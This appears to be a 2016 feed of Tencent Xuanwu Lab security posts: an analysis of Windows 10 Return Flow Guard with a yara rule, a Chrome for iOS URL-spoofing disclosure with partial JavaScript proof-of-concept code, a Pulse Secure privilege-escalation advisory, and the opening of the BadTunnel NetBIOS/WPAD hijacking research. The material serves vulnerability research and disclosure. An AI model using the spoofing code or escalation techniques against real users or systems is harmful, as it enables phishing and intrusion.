Tencent's Xuanwu Lab http://xlab.tencent.com/en Wed, 21 Dec 2016 08:35:57 +0000

Return Flow Guard http://xlab.tencent.com/en/2016/11/02/return-flow-guard/ Wed, 02 Nov 2016 06:29:27 +0000

[DannyWei, lywang, FlowerCode] of Tencent Xuanwu Lab

This is preliminary documentation of the RFG implementation. We will update it as we obtain new findings and corrections.

We analyzed the Return Flow Guard introduced in Windows 10 Redstone 2 14942, released on October 7, 2016.


Microsoft introduced Control Flow Guard (CFG) in Windows 8.1 to protect against malicious modification of indirect call function pointers. CFG checks the target function pointer before each indirect call. However, CFG cannot detect modification of the return address on the stack, and therefore cannot stop Return Oriented Programming.
The newly added RFG effectively stops these kinds of attacks by saving the return address to fs:[rsp] at the entry of each function and comparing it with the return address on the stack before returning.
Enabling RFG requires both compiler and operating system support. During compilation, the compiler instruments the file by reserving space for the RFG instructions in the form of nop instructions.
When the target executable runs on a supported operating system, the reserved spaces are dynamically replaced with RFG instructions that check function return addresses. Otherwise, the nop instructions do not interfere with the normal execution flow of the program.
The difference between RFG and GS (Buffer Security Check) is that the GS stack cookie can be obtained through an information leak or brute force, whereas the RFG return address is written to the Thread Control Stack, out of reach of attackers. This significantly increases the difficulty of the attack.



This variable is controlled by a registry value located at:

\Registry\Machine\SYSTEM\CurrentControlSet\Control\Session Manager\kernel
EnableRfg : REG_DWORD

2.1.1 Initialization

KiSystemStartup -> KiInitializeKernel -> InitBootProcessor -> CmGetSystemControlValues


Control flags are stored in the IMAGE_LOAD_CONFIG_DIRECTORY64 structure in the PE file.
Flags in the GuardFlags field indicate the RFG support status.

#define IMAGE_GUARD_RF_INSTRUMENTED                    0x00020000 // Module contains return flow instrumentation and metadata
#define IMAGE_GUARD_RF_ENABLE                          0x00040000 // Module requests that the OS enable return flow protection
#define IMAGE_GUARD_RF_STRICT                          0x00080000 // Module requests that the OS enable return flow protection in strict mode
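
As a rough illustration of how these bits can be tested, the following Python sketch decodes a GuardFlags value using the three constants listed above. The helper name describe_rfg_flags and the sample value are hypothetical and are not taken from any real binary or tool.

```python
# Bit values copied from the IMAGE_GUARD_RF_* definitions above.
IMAGE_GUARD_RF_INSTRUMENTED = 0x00020000
IMAGE_GUARD_RF_ENABLE = 0x00040000
IMAGE_GUARD_RF_STRICT = 0x00080000

# Short display names (hypothetical, chosen for this sketch only).
RF_FLAG_NAMES = {
    IMAGE_GUARD_RF_INSTRUMENTED: "RF_INSTRUMENTED",
    IMAGE_GUARD_RF_ENABLE: "RF_ENABLE",
    IMAGE_GUARD_RF_STRICT: "RF_STRICT",
}


def describe_rfg_flags(guard_flags):
    """Return the names of the RFG bits that are set in a GuardFlags value."""
    return [name for bit, name in RF_FLAG_NAMES.items() if guard_flags & bit]


if __name__ == "__main__":
    # 0x00060000 is a made-up sample value, not read from a real module.
    print(describe_rfg_flags(0x00060000))
```

Other bits in GuardFlags (for example the CFG related ones) are simply ignored by this helper.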


2.3.1 Querying

The RFG status can be queried through the Win32 API GetProcessMitigationPolicy.

// ...
    ProcessReturnFlowGuardPolicy = 11
// ...

2.3.2 Structure Definition

    union {
        DWORD Flags;
        struct {
            DWORD EnableReturnFlowGuard : 1;
            DWORD StrictMode : 1;
            DWORD ReservedFlags : 30;
        };
    };



RFG instrumented portable executables have added several new fields, 24 bytes in total.

ULONGLONG  GuardRFFailureRoutine; 
ULONGLONG  GuardRFFailureRoutineFunctionPointer; 
DWORD      DynamicValueRelocTableOffset;
WORD       DynamicValueRelocTableSection;

2 pointers (16 bytes):
Virtual Address of the _guard_ss_verify_failure function
Virtual address of the _guard_ss_verify_failure_fptr function pointer, which points to the _guard_ss_verify_failure_default function by default.

Information about the address table (6 bytes):
DynamicValueRelocTableOffset records the offset of the dynamic relocation table relative to the relocation table, and
DynamicValueRelocTableSection records the section index of the dynamic value relocation table.
The remaining bytes are reserved.
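
The 24-byte total can be checked with a small Python sketch that unpacks the four fields listed above. It assumes little-endian packing without padding and treats the remaining reserved bytes as a single 16-bit field; the function name parse_rfg_fields is hypothetical.

```python
import struct

# Little-endian, no padding: two ULONGLONG pointers, one DWORD, one WORD,
# and (assumption) one WORD standing in for the remaining reserved bytes.
RFG_FIELDS_FORMAT = "<QQIHH"


def parse_rfg_fields(blob):
    """Unpack the 24 bytes of RFG fields described in the text."""
    (failure_routine, failure_routine_fptr,
     table_offset, table_section, _reserved) = struct.unpack(RFG_FIELDS_FORMAT, blob)
    return {
        "GuardRFFailureRoutine": failure_routine,
        "GuardRFFailureRoutineFunctionPointer": failure_routine_fptr,
        "DynamicValueRelocTableOffset": table_offset,
        "DynamicValueRelocTableSection": table_section,
    }
```

Here 8 + 8 + 4 + 2 bytes of named fields plus 2 reserved bytes give the 24 bytes stated above.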


RFG instrumented portable executables have a new dynamic relocation table after the normal relocation table.

    DWORD Version;
    DWORD Size;
//  IMAGE_DYNAMIC_RELOCATION DynamicRelocations[0];

    PVOID Symbol;
    DWORD BaseRelocSize;
//  IMAGE_BASE_RELOCATION BaseRelocations[0];

typedef struct _IMAGE_BASE_RELOCATION {
    DWORD   VirtualAddress;
    DWORD   SizeOfBlock;
//  WORD    TypeOffset[1];
} IMAGE_BASE_RELOCATION;

The Symbol field in IMAGE_DYNAMIC_RELOCATION indicates whether the stored entries are for function prologues or function epilogues, defined as follows:

The absolute address of an entry can be calculated from ImageBase + VirtualAddress + TypeOffset.
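
The address calculation can be sketched in Python as follows. This is a minimal illustration that assumes the usual base relocation encoding, where the low 12 bits of each TypeOffset word hold the offset within the page and the high 4 bits hold the type; whether RFG entries use the high bits is not confirmed here. The function name and the sample values are hypothetical.

```python
def entry_address(image_base, block_virtual_address, type_offset):
    """Compute ImageBase + VirtualAddress + TypeOffset for one entry."""
    # Assumption: as in ordinary base relocations, only the low 12 bits
    # of the TypeOffset word are an offset; the high 4 bits are a type.
    page_offset = type_offset & 0x0FFF
    return image_base + block_virtual_address + page_offset


if __name__ == "__main__":
    # Made-up inputs: image base 0x140000000, block RVA 0x1000, offset 0x76C.
    print(hex(entry_address(0x140000000, 0x1000, 0x076C)))
```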



4.1.1 Inserted Prologue Bytes (9 Bytes)

xchg    ax, ax
nop     dword ptr [rax+00000000h]

4.1.2 Inserted Epilogue Bytes (Example, 15 Bytes)

db 0Eh dup(90h)

To reduce overhead, the compiler also inserts a _guard_ss_common_verify_stub function. Instead of inserting nop bytes at the end of every function, the compiler simply ends most functions with a jmp to this stub function. The stub contains nop bytes that the kernel replaces with the epilogue bytes at runtime, followed by a retn instruction.

__guard_ss_common_verify_stub proc near
db 0Eh dup(90h)
__guard_ss_common_verify_stub endp


MiPerformRfgFixups performs the instruction replacement according to the function information stored in IMAGE_DYNAMIC_RELOCATION_TABLE when a new executable section is being created.

4.2.1 Replaced Prologue Bytes (9 Bytes)

The kernel uses MiRfgInstrumentedPrologueBytes to replace compiler inserted prologue bytes.

mov     rax, [rsp]
mov     fs:[rsp], rax

4.2.2 Replaced Epilogue Bytes (15 Bytes)

The kernel uses MiRfgInstrumentedEpilogueBytes and the address of the _guard_ss_verify_failure function recorded in the load configuration directory (GuardRFFailureRoutine) to replace the compiler inserted epilogue bytes.

mov     r11, fs:[rsp]
cmp     r11, [rsp]
jne     _guard_ss_verify_failure
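
The byte counts given in the headings can be checked against the opcode bytes that appear in the yara pattern and WinDbg listings later in this article. The Python sketch below only compares lengths and assembles the epilogue with a caller-supplied jne displacement; the helper name build_epilogue is hypothetical, and this is not the kernel's actual patching code.

```python
# Compiler-inserted placeholder: xchg ax, ax ; nop dword ptr [rax+00000000h]
NOP_PROLOGUE = bytes.fromhex("66 90 0F 1F 80 00 00 00 00")
# Kernel-written prologue: mov rax, [rsp] ; mov fs:[rsp], rax
RFG_PROLOGUE = bytes.fromhex("48 8B 04 24 64 48 89 04 24")
# Kernel-written epilogue without the final jump:
# mov r11, fs:[rsp] ; cmp r11, [rsp]
RFG_EPILOGUE_HEAD = bytes.fromhex("64 4C 8B 1C 24 4C 3B 1C 24")


def build_epilogue(rel32):
    """Append 'jne rel32' (0F 85 + signed 32-bit displacement) to the head."""
    return RFG_EPILOGUE_HEAD + b"\x0F\x85" + rel32.to_bytes(4, "little", signed=True)


if __name__ == "__main__":
    print(len(NOP_PROLOGUE), len(RFG_PROLOGUE), len(build_epilogue(0xF5)))
```

Because the replacement sequences have exactly the same length as the reserved nop bytes, the surrounding code does not need to move.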


To implement RFG, Microsoft introduced the Thread Control Stack and repurposed the fs segment register on the x64 architecture. When an RFG enabled process executes the mov fs:[rsp], rax instruction, the fs segment register points to the current thread’s ControlStackLimit on the control stack, and rax is written at offset rsp from that base.
All user mode threads in a process use different memory blocks within the same Thread Control Stack. We can enumerate the virtual address descriptor (VAD) tree of the process to obtain the _MMVAD structure that describes the process’s Thread Control Stack.

    typedef struct _MMVAD {
      /* 0x0000 */ struct _MMVAD_SHORT Core;
      union {
        union {
          /* 0x0040 */ unsigned long LongFlags2;
          /* 0x0040 */ struct _MMVAD_FLAGS2 VadFlags2;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u2;
      /* 0x0044 */ long Padding_;
      /* 0x0048 */ struct _SUBSECTION* Subsection;
      /* 0x0050 */ struct _MMPTE* FirstPrototypePte;
      /* 0x0058 */ struct _MMPTE* LastContiguousPte;
      /* 0x0060 */ struct _LIST_ENTRY ViewLinks;
      /* 0x0070 */ struct _EPROCESS* VadsProcess;
      union {
        union {
          /* 0x0078 */ struct _MI_VAD_SEQUENTIAL_INFO SequentialVa;
          /* 0x0078 */ struct _MMEXTEND_INFO* ExtendedInfo;
        }; /* size: 0x0008 */
      } /* size: 0x0008 */ u4;
      /* 0x0080 */ struct _FILE_OBJECT* FileObject;
    } MMVAD, *PMMVAD; /* size: 0x0088 */

    typedef struct _MMVAD_SHORT {
      union {
        /* 0x0000 */ struct _RTL_BALANCED_NODE VadNode;
        /* 0x0000 */ struct _MMVAD_SHORT* NextVad;
      }; /* size: 0x0018 */
      /* 0x0018 */ unsigned long StartingVpn;
      /* 0x001c */ unsigned long EndingVpn;
      /* 0x0020 */ unsigned char StartingVpnHigh;
      /* 0x0021 */ unsigned char EndingVpnHigh;
      /* 0x0022 */ unsigned char CommitChargeHigh;
      /* 0x0023 */ unsigned char SpareNT64VadUChar;
      /* 0x0024 */ long ReferenceCount;
      /* 0x0028 */ struct _EX_PUSH_LOCK PushLock;
      union {
        union {
          /* 0x0030 */ unsigned long LongFlags;
          /* 0x0030 */ struct _MMVAD_FLAGS VadFlags;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u;
      union {
        union {
          /* 0x0034 */ unsigned long LongFlags1;
          /* 0x0034 */ struct _MMVAD_FLAGS1 VadFlags1;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u1;
      /* 0x0038 */ struct _MI_VAD_EVENT_BLOCK* EventList;
    } MMVAD_SHORT, *PMMVAD_SHORT; /* size: 0x0040 */

    typedef struct _RTL_BALANCED_NODE {
      union {
        /* 0x0000 */ struct _RTL_BALANCED_NODE* Children[2];
        struct {
          /* 0x0000 */ struct _RTL_BALANCED_NODE* Left;
          /* 0x0008 */ struct _RTL_BALANCED_NODE* Right;
        }; /* size: 0x0010 */
      }; /* size: 0x0010 */
      union {
        /* 0x0010 */ unsigned char Red : 1; /* bit position: 0 */
        /* 0x0010 */ unsigned char Balance : 2; /* bit position: 0 */
        /* 0x0010 */ unsigned __int64 ParentValue;
      }; /* size: 0x0008 */
    } RTL_BALANCED_NODE, *PRTL_BALANCED_NODE; /* size: 0x0018 */

    typedef struct _RTL_AVL_TREE {
      /* 0x0000 */ struct _RTL_BALANCED_NODE* Root;
    } RTL_AVL_TREE, *PRTL_AVL_TREE; /* size: 0x0008 */

    typedef struct _EPROCESS {
        struct _RTL_AVL_TREE VadRoot;

We can use _EPROCESS.VadRoot to walk through the VAD tree. If _MMVAD.Core.VadFlags.RfgControlStack flag is set, the current _MMVAD describes the virtual memory address range of the thread control stack (StartingVpn, EndingVpn, StartingVpnHigh, EndingVpnHigh in _MMVAD.Core), defined as follows:

    typedef struct _MMVAD_FLAGS {
      struct /* bitfield */ {
        /* 0x0000 */ unsigned long VadType : 3; /* bit position: 0 */
        /* 0x0000 */ unsigned long Protection : 5; /* bit position: 3 */
        /* 0x0000 */ unsigned long PreferredNode : 6; /* bit position: 8 */
        /* 0x0000 */ unsigned long NoChange : 1; /* bit position: 14 */
        /* 0x0000 */ unsigned long PrivateMemory : 1; /* bit position: 15 */
        /* 0x0000 */ unsigned long PrivateFixup : 1; /* bit position: 16 */
        /* 0x0000 */ unsigned long ManySubsections : 1; /* bit position: 17 */
        /* 0x0000 */ unsigned long Enclave : 1; /* bit position: 18 */
        /* 0x0000 */ unsigned long DeleteInProgress : 1; /* bit position: 19 */
        /* 0x0000 */ unsigned long PageSize64K : 1; /* bit position: 20 */
        /* 0x0000 */ unsigned long RfgControlStack : 1; /* bit position: 21 */ 
        /* 0x0000 */ unsigned long Spare : 10; /* bit position: 22 */
      }; /* bitfield */
    } MMVAD_FLAGS, *PMMVAD_FLAGS; /* size: 0x0004 */
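
Given raw field values read from a _MMVAD_SHORT (for example in a kernel debugger), the flag test and the address range can be computed as in the Python sketch below. It assumes 4 KB pages and that EndingVpn is inclusive; the function names are hypothetical.

```python
RFG_CONTROL_STACK_BIT = 21  # bit position of RfgControlStack in _MMVAD_FLAGS
PAGE_SIZE = 0x1000          # assumption: 4 KB pages


def is_rfg_control_stack(long_flags):
    """Test the RfgControlStack bit in _MMVAD_SHORT.u.LongFlags."""
    return bool((long_flags >> RFG_CONTROL_STACK_BIT) & 1)


def vad_range(starting_vpn, starting_vpn_high, ending_vpn, ending_vpn_high):
    """Return (first byte, last byte) of the range described by a VAD."""
    start = ((starting_vpn_high << 32) | starting_vpn) * PAGE_SIZE
    # Assumption: EndingVpn names the last page of the range (inclusive).
    end = ((ending_vpn_high << 32) | ending_vpn) * PAGE_SIZE + PAGE_SIZE - 1
    return start, end
```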

    typedef struct _MI_VAD_EVENT_BLOCK {
      /* 0x0000 */ struct _MI_VAD_EVENT_BLOCK* Next;
      union {
        /* 0x0008 */ struct _KGATE Gate;
        /* 0x0008 */ struct _MMADDRESS_LIST SecureInfo;
        /* 0x0008 */ struct _RTL_BITMAP_EX BitMap;
        /* 0x0008 */ struct _MMINPAGE_SUPPORT* InPageSupport;
        /* 0x0008 */ struct _MI_LARGEPAGE_IMAGE_INFO LargePage;
        /* 0x0008 */ struct _ETHREAD* CreatingThread;
        /* 0x0008 */ struct _MI_SUB64K_FREE_RANGES PebTebRfg;
        /* 0x0008 */ struct _MI_RFG_PROTECTED_STACK RfgProtectedStack;
      }; /* size: 0x0038 */
      /* 0x0040 */ unsigned long WaitReason;
      /* 0x0044 */ long __PADDING__[1];
    } MI_VAD_EVENT_BLOCK, *PMI_VAD_EVENT_BLOCK; /* size: 0x0048 */

    typedef struct _MI_RFG_PROTECTED_STACK {
      /* 0x0000 */ void* ControlStackBase;
      /* 0x0008 */ struct _MMVAD_SHORT* ControlStackVad;

When an RFG protected thread is created, nt!MmSwapThreadControlStack sets the thread’s ETHREAD.UserFsBase. It uses MiLocateVadEvent to find the MMVAD from which UserFsBase is derived.
It uses the following formula to calculate ETHREAD.UserFsBase:

ControlStackBase = MMVAD.Core.EventList.RfgProtectedStack.ControlStackBase
ControlStackLimitDelta = ControlStackBase - (MMVAD.Core.StartingVpnHigh * 0x100000000 + MMVAD.Core.StartingVpn ) * 0x1000
ETHREAD.UserFsBase = ControlStackLimitDelta

Each thread has its own shadow stack range in the Thread Control Stack. If the current thread uses the range ControlStackBase ~ ControlStackLimit, then ControlStackLimit = KTHREAD.StackLimit + ControlStackLimitDelta. So the actual value stored in UserFsBase is the offset of ControlStackLimit from StackLimit. When multiple threads access the shadow stack simultaneously, each thread accesses the address ETHREAD.UserFsBase + rsp.
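
The formula above can be worked through with a short Python sketch. It follows the article's arithmetic literally and assumes 64-bit wraparound for the final address; the function names and the numbers in the usage lines are made up for illustration.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF  # addresses wrap at 64 bits (assumption)


def control_stack_limit_delta(control_stack_base, starting_vpn, starting_vpn_high):
    """ControlStackBase minus the VAD start address, as in the formula above."""
    vad_start = (starting_vpn_high * 0x100000000 + starting_vpn) * 0x1000
    return (control_stack_base - vad_start) & MASK64


def shadow_slot_address(user_fs_base, rsp):
    """Address touched by 'mov fs:[rsp], rax': UserFsBase + rsp."""
    return (user_fs_base + rsp) & MASK64


if __name__ == "__main__":
    # Hypothetical values: the VAD starts at page 0x7FF00000.
    delta = control_stack_limit_delta(0x7FF00004000, 0x7FF00000, 0)
    print(hex(delta), hex(shadow_slot_address(delta, 0x1000)))
```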


We wrote a simple yara signature to identify RFG instrumented PE files.

rule rfg {
    strings:
        $pe = { 4d 5a }
        $a = { 66 90 0F 1F 80 00 00 00 00 }
        $b = { C3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 C3 }
        $c = { E9 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 E9 }

    condition:
        $pe at 0 and $a and ($b or $c)
}
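
For readers without yara at hand, roughly the same check can be approximated in Python with byte-level regular expressions. This is only a sketch of the matching logic of the rule above, not a replacement for yara; the function name looks_rfg_instrumented is hypothetical.

```python
import re

# $a: the 9 placeholder bytes the compiler puts at a function entry.
PROLOGUE_NOPS = bytes.fromhex("66 90 0F 1F 80 00 00 00 00")
# $b: retn, 14 nop bytes, retn.
EPILOGUE_NOPS = re.compile(rb"\xC3\x90{14}\xC3")
# $c: jmp rel32, 10 nop bytes, then the next jmp opcode.
JMP_STUB_NOPS = re.compile(rb"\xE9.{4}\x90{10}\xE9", re.DOTALL)


def looks_rfg_instrumented(data):
    """Return True when the bytes match: $pe at 0 and $a and ($b or $c)."""
    if not data.startswith(b"MZ"):
        return False
    if PROLOGUE_NOPS not in data:
        return False
    return bool(EPILOGUE_NOPS.search(data) or JMP_STUB_NOPS.search(data))
```

A caller would read a file in binary mode and pass its contents to the function.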


yara64.exe -r -f rfg.yara %SystemRoot%

We can observe from the output that most system executable files are already RFG instrumented in this version of Windows.
Here we use IDA Pro and WinDbg to examine an RFG instrumented calc.exe.

.text:000000014000176C wWinMain
.text:000000014000176C                 xchg    ax, ax
.text:000000014000176E                 nop     dword ptr [rax+00000000h]

The entry point before runtime replacement

0:000> u calc!wWinMain
00007ff7`91ca176c 488b0424        mov     rax,qword ptr [rsp]
00007ff7`91ca1770 6448890424      mov     qword ptr fs:[rsp],rax

The entry point after runtime replacement

.text:00000001400025BC __guard_ss_common_verify_stub
.text:00000001400025BC                 retn
.text:00000001400025BD                 db 0Eh dup(90h)
.text:00000001400025CB                 retn

The common verify stub function before runtime replacement

0:000> u calc!_guard_ss_common_verify_stub
00007ff7`91ca25bc 644c8b1c24      mov     r11,qword ptr fs:[rsp]
00007ff7`91ca25c1 4c3b1c24        cmp     r11,qword ptr [rsp]
00007ff7`91ca25c5 0f85f5000000    jne     calc!_guard_ss_verify_failure (00007ff7`91ca26c0)
00007ff7`91ca25cb c3              ret

The common verify stub function after runtime replacement


Exploring Control Flow Guard in Windows 10 Jack Tang, Trend Micro Threat Solution Team

CVE-2016-1707 Chrome Address Bar URL Spoofing on IOS http://xlab.tencent.com/en/2016/10/10/cve-2016-1707-chrome-address-bar-url-spoofing-on-ios/ Mon, 10 Oct 2016 03:18:36 +0000

I reported an address bar URL spoofing vulnerability in Chrome for iOS (CVE-2016-1707) to Google in June 2016. A URL spoofing vulnerability lets an attacker display a forged, legitimate-looking website address in the address bar, which can be exploited to launch phishing attacks.

Affected version: Chrome < v52.0.2743.82, IOS < v10

0x01 Vulnerability Details




function pwned() {

    var t = window.open('https://www.gmail.com/', 'aaaa');
    t.document.write("<h1>Address bar says https://www.gmail.com/ - this is NOT https://www.gmail.com/</h1>");


<a href="https://hack.com::/"  target="aaaa" onclick="setTimeout('pwned()','500')">click me</a><br>

How does the vulnerability occur? When the user clicks the ‘click me’ link, the browser opens a new window named aaaa, which loads “https://hack.com::”; this address can be chosen arbitrarily. After 500 milliseconds, pwned() runs and opens ‘https://www.gmail.com’ in the aaaa window; this URL can also be empty. Up to this point everything behaves normally. The code that follows is the core that triggers the vulnerability.

base64 payload code:

    var link = document.createElement('a');
    link.href = 'https://gmail.com::';

The aaaa window then begins loading ‘https://gmail.com::’. Happily for the attacker, Chrome allows the load and registers the address as a pending entry. Because ‘https://gmail.com::’ is an invalid address, I think Chrome should navigate to about:blank, but instead Chrome commits the pending entry (‘https://gmail.com::’) and promotes it to the last committed URL. At this point the entire loading process is complete, and the address bar displays a spoofed URL.

Online demo:



0x02 Fixed

[IOS] Do not commit invalid URLs during web load.

[self optOutScrollsToTopForSubviews];

  // Ensure the URL is as expected (and already reported to the delegate).
- DCHECK(currentURL == _lastRegisteredRequestURL)
+ // If |_lastRegisteredRequestURL| is invalid then |currentURL| will be
+ // "about:blank".
+ DCHECK((currentURL == _lastRegisteredRequestURL) ||
+        (!_lastRegisteredRequestURL.is_valid() &&
+         _documentURL.spec() == url::kAboutBlankURL))
      << std::endl
      << "currentURL = [" << currentURL << "]" << std::endl
      << "_lastRegisteredRequestURL = [" << _lastRegisteredRequestURL << "]";

  // This is the point where the document's URL has actually changed, and
  // pending navigation information should be applied to state information.
  [self setDocumentURL:net::GURLWithNSURL([_webView URL])];
- DCHECK(_documentURL == _lastRegisteredRequestURL);
+
+ if (!_lastRegisteredRequestURL.is_valid() &&
+     _documentURL != _lastRegisteredRequestURL) {
+   // if |_lastRegisteredRequestURL| is an invalid URL, then |_documentURL|
+   // will be "about:blank".
+   [[self sessionController] updatePendingEntry:_documentURL];
+ }
+ DCHECK(_documentURL == _lastRegisteredRequestURL ||
+        (!_lastRegisteredRequestURL.is_valid() &&
+         _documentURL.spec() == url::kAboutBlankURL));
+
  self.webStateImpl->OnNavigationCommitted(_documentURL);
  [self commitPendingNavigationInfo];
  if ([self currentBackForwardListItemHolder]->navigation_type() ==

0x03 Disclosure Timeline:

2016/6/22 Reported to Google, https://bugs.chromium.org/

2016/6/22 Google assigned Security_Severity-High

2016/7/14 Google rewarded $3000

2016/7/20 Google advisory disclosed, CVE-2016-1707

2016/10/2 Google disclosed publicly

0x04 References

[1] https://googlechromereleases.blogspot.com/2016/07/stable-channel-update.html

[2] https://bugs.chromium.org/p/chromium/issues/detail?id=622183

[3] https://chromium.googlesource.com/chromium/src/+/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5

Pulse Secure Desktop Client (Juniper Junos Pulse) Privilege Escalation http://xlab.tencent.com/en/2016/07/19/xlab-16-001/ Tue, 19 Jul 2016 10:00:11 +0000

XLAB ID: XLAB-16-001

CVE ID: CVE-2016-2408     

Patch Status: Fixed

Affected Products:
– Pulse Secure Desktop Client (Juniper Junos Pulse) All Versions up to v5.2r3

Vendor Provided (see vendor advisory in Solution section for details):
– Pulse Secure Desktop Client 5.2R1 to 5.2R2, 5.1R1 to 5.1R9, 5.0R1 to 5.0R15
– Standalone Pulse Installer Service 8.2R1 to 8.2R2, 8.1R1 to 8.1R9, 8.0R1 to 8.0R15, 7.4R1 to 7.4R13.6
– Pulse Secure Collaboration 8.2R1 to 8.2R2, 8.1R1 to 8.1R9, 8.0R1 to 8.0R15
– Odyssey Access Client all versions before 5.6R16

This vulnerability only affects the Windows operating system.

“The Pulse Secure desktop client provides a secure and authenticated connection from an endpoint device (either Windows or Mac OS X) to a Pulse Secure gateway (either Pulse Connect Secure or Pulse Policy Secure).”

Vulnerability Details:
Juniper Junos Pulse (now known as Pulse Secure Desktop Client) installs a system service dsAccessService.exe, which owns a named pipe NeoterisSetupService.

This named pipe has an Everyone Full Control ACL and is writable by all users.

The pipe server employs a custom encryption function. The key is derived from processor type, processor frequency, operating system product id, operating system version, and hardcoded values.

This pipe is used to install new services, possibly for automatic upgrade purpose. Once new data is received from the pipe, it is decrypted as a file path, and the specified file is copied to C:\Windows\Temp\ and executed.

The service installation logic is implemented in dsInstallService.dll. It reads the path and splits the file name from it. However, this implementation has a bug: it splits the string only at the “\” character and ignores the “/” character.

Passing in a path such as “C:\Users/Guest/AppData/Local/test.exe” causes it to use “Users/Guest/AppData/Local/test.exe” as the file name, and to call CopyFile with the destination path “C:\Windows\Temp\Users/Guest/AppData/Local/test.exe”.

When the CopyFile call fails, the program uses the original path “C:\Users/Guest/AppData/Local/test.exe” to create the new process.

Finally, the service verifies the digital signature before executing the file. However, since the path is completely controlled by the attacker, simply placing a signed executable under “C:\Users/Guest/AppData/Local/” and hijacking it with a malicious DLL leads to arbitrary code execution and privilege escalation to SYSTEM.
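
The path handling described above can be sketched in Python. The function names are hypothetical and the code only models the string splitting, not the actual logic of dsInstallService.dll; strict_file_name shows one possible way to treat both separators and is not the vendor's fix.

```python
import re

TEMP_DIR = "C:\\Windows\\Temp\\"


def flawed_file_name(path):
    """Model of the bug: only the backslash is treated as a separator."""
    return path.rsplit("\\", 1)[-1]


def flawed_copy_destination(path):
    """Destination that the CopyFile call would be given in this model."""
    return TEMP_DIR + flawed_file_name(path)


def strict_file_name(path):
    """Illustrative alternative: split on both '\\' and '/'."""
    return re.split(r"[\\/]", path)[-1]


if __name__ == "__main__":
    attacker_path = "C:\\Users/Guest/AppData/Local/test.exe"
    print(flawed_copy_destination(attacker_path))
    print(strict_file_name(attacker_path))
```

With the example path from the text, the flawed split yields a destination containing forward-slash subdirectories that are unlikely to exist under the Temp directory, which is why the copy fails and the original attacker-controlled path is executed instead.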

Install the latest version of Pulse Secure product, which is available from Pulse Secure official website.
Pulse Secure has also issued an advisory about this vulnerability:

Disclosure Timeline:

2016/02/18 Report vulnerability to MITRE
2016/02/18 MITRE assigned CVE-ID CVE-2016-2408
2016/02/18 Provide vulnerability detail and CVE-ID to Pulse Secure via psirt at pulsesecure.net
2016/02/18 Pulse Secure responded that they are developing a fix, but no timeline is available
2016/03/07 Pulse Secure responded that they are still developing a fix, but no timeline is available,
“update soon”
2016/03/25 Pulse Secure responded that they are still developing a fix, but no timeline is available
2016/04/22 Notify Pulse Secure it is now 63 days since original report, asking fix progress
2016/04/26 Pulse Secure responded that they are still developing a fix, but no timeline is available,
asking for grace periods
2016/05/03 Reply that we do give grace periods but need an ETA
2016/05/12 Pulse Secure responded that they are still developing a fix, but no timeline is available
2016/05/19 Pulse Secure responded that they are still developing a fix, ETA is October 2016,
asking for grace periods
2016/05/20 Reply that we do not give grace period this long and another 60 days is the maximum.
2016/05/20 Pulse Secure responded that another 60 days is acceptable
2016/07/18 Pulse Secure responded that an issue has been found in internal testing, and
request another extension to August 1, 2016.
2016/07/18 Reply that we have already requested coordination from multiple organizations and
the process is irreversible. Last day is July 25, 2016.
2016/07/25 Coordinated disclosure

This vulnerability was discovered by:   Zhipeng Huo

BadTunnel – A New Hope http://xlab.tencent.com/en/2016/06/17/badtunnel-a-new-hope/ Fri, 17 Jun 2016 08:20:27 +0000

This article proposes a new attack model, named “BadTunnel”, for hijacking TCP/IP broadcast protocols across different network segments.

With this method, NetBIOS Name Service spoofing can be achieved regardless of whether the attacker and the victim are on the same network, and regardless of the firewalls and NAT devices in between. All that is needed is for the victim to navigate to a malicious web page with IE or Edge, or to open a specially crafted document; the attacker can then hijack the victim’s NetBIOS name queries to pose as a print server or file server in the local network.

By hijacking the WPAD name, the attacker can hijack all network communications, including but not limited to ordinary web access, the Windows Update service, and Microsoft Crypto API certificate revocation list updates. Once the hijack succeeds, it is easy to achieve arbitrary program execution on the target system by using Evilgrade [1].

This method is effective on all Windows versions before the June 2016 patch. It can be exploited through all versions of Internet Explorer, Microsoft Edge, and Microsoft Office, as well as through third-party applications. In fact, a BadTunnel attack can be conducted anywhere that a file URI scheme or UNC path can be embedded. For example, if a shortcut’s icon path points to a malicious file URI scheme or UNC path, the BadTunnel attack is triggered the moment the user sees the shortcut in Windows Explorer, which means BadTunnel can also be exploited through web pages, emails, USB flash drives and many other ways. It can even impact Web servers and SQL servers [2].

(This article does not include all contents covered by the BadTunnel research; the remaining part will be released in my presentation “BadTunnel: How do I get Big Brother power” at BlackHat US 2016.)

0x00 Background

NetBIOS is an ancient protocol. In 1987, the IETF released RFC 1001 and RFC 1002, which defined NetBIOS over TCP/IP, or NBT for short. NetBIOS includes three services, among them the name service NetBIOS-NS, or NBNS for short. NBNS can resolve local names by broadcasting in the LAN.

When trying to access \\Tencent\Xuanwu\Lab\tk.txt, NBNS will send an NBNS NB query to the broadcast address:

Who is “Tencent”?

Any host in LAN can respond to this request:

“Tencent” is at

Then the victim’s computer will accept this response and try to access \\\XuanwuLab\tk.txt.

This mechanism is definitely not safe, but since the LAN is usually treated as a trusted network, this spoofing possibility is not considered a vulnerability, just like ARP spoofing.

WPAD (Web Proxy Auto-Discovery Protocol) is another ancient protocol with over 20 years of history. As the name suggests, it is used to automatically discover and configure the system proxy. Almost all operating systems support WPAD, but only Windows enables it by default. According to this protocol, Windows tries to resolve the name WPAD and retrieve the proxy configuration script from http://WPAD/wpad.dat.

On Windows, the name “WPAD” is resolved by NBNS. As previously stated, any host in a LAN can claim to be “WPAD”. This is not secure but acceptable, since the LAN is considered a trusted network environment. Although WPAD hijacking was discovered more than a decade ago and was used by the Flame worm, it is not considered a security vulnerability, just like ARP spoofing.

NBNS is implemented on top of UDP, which is a stateless protocol. Firewalls, NAT devices and other network devices cannot distinguish which session a UDP packet belongs to, so they must allow UDP packets in both directions.

NBNS name query uses the broadcast protocol, but like most other broadcast protocols, NBNS accept responses from outside the network segment. Which means, if sends a request to, but responds in time, the response will be accepted by In some enterprise networks, this is required by the network topology.

0x01 Implementation

If we could send a fake response from outside the network segment while NBNS is performing a name query, it would still be accepted. Therefore, NBNS spoofing across different network segments is possible, but with a few problems:

